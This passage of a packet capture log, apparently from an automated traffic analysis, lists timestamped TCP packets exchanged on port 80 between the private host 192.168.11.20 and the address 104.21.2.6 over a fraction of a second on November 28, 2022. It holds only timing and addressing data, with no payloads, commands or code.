Nov 28, 2022 16:37:04.225711107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225775003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225811005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225831032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225846052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225886106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.225888968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225904942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225922108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.225936890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.226011038 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.226181030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.231309891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231408119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231460094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231472015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231484890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231498957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231511116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231523037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231534958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231548071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231559992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231578112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231604099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231615067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231626987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231657028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231661081 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.231710911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231723070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231734037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231745958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231764078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231784105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231806040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231822014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231826067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.231826067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.231843948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231856108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231868029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231879950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231892109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231904984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231916904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231929064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231940985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231952906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231965065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231976032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.231995106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.232167006 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.232167006 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.250154972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250281096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250293970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250304937 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250317097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250329018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250343084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250354052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250365973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250376940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250387907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250399113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250411034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250422001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250433922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250444889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250456095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250468016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250478983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250488043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.250488043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.250500917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250513077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250524044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250535011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250546932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250557899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250567913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250579119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250591040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250602007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250613928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250624895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250636101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250648022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250660896 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.250669003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250680923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250691891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250704050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250715971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250726938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250737906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250750065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250761032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250771999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250783920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250794888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250806093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250814915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.250828028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.250828028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.251043081 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.271322966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271415949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271430016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271454096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271465063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271476030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271486998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271497965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271502018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.271517038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271528006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271538973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271550894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271555901 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.271569967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271580935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271591902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271644115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271656990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271691084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271704912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271717072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271722078 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.271734953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271745920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271756887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271768093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271778107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271787882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271797895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271809101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271820068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271867037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271893024 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.271915913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271928072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271939993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271950960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271962881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271975040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271986008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.271997929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272010088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272022009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272032976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272044897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272057056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272059917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272073030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272084951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272097111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272109032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272120953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272133112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272145033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272156954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272166967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272178888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272191048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272202015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272213936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272226095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272233963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272233963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272279978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272299051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272340059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272351027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272377014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272387028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272399902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272412062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272422075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272433043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272444963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272455931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272466898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272476912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272490025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272507906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272527933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272547960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272561073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272572041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272583008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272593021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272604942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272609949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272609949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272623062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272660017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272685051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272696018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272706985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272717953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272728920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272738934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272749901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272761106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272768974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.272782087 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272960901 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.272960901 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282021999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282107115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282121897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282135010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282146931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282159090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282170057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282180071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282191038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282202005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282213926 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282233953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282244921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282255888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282267094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282279015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282289982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282299995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282332897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282344103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282380104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282386065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282386065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282399893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282412052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282423019 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282433987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282444954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282454014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282464981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282475948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282486916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282497883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282509089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282519102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282531023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282541990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282555103 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282581091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282593012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282640934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282651901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282664061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282675028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282685995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282696962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282706976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282717943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282723904 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282735109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282747030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282757044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282768011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282778978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282789946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282800913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282810926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282844067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282855034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.282895088 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282895088 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.282948017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283001900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283014059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283025026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283035994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283046961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283056021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.283058882 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.283229113 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.283391953 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.286282063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286379099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286427021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286438942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286452055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286463976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286475897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286487103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286498070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286509037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286519051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.286617041 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.286617041 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.286814928 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292064905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292155981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292208910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292231083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292248964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292273998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292294979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292321920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292340040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292360067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292373896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292385101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292396069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292413950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292443037 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292443037 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292443991 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292459011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292489052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292500973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292511940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292524099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292562008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292573929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292584896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292608976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292608976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292634964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292646885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292659044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292669058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292692900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292721987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292732954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292743921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292754889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292773962 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292783976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292809963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292824984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292836905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292848110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292865992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292879105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292891979 CET	80	49830	104.21.2.6	192.168.11.20
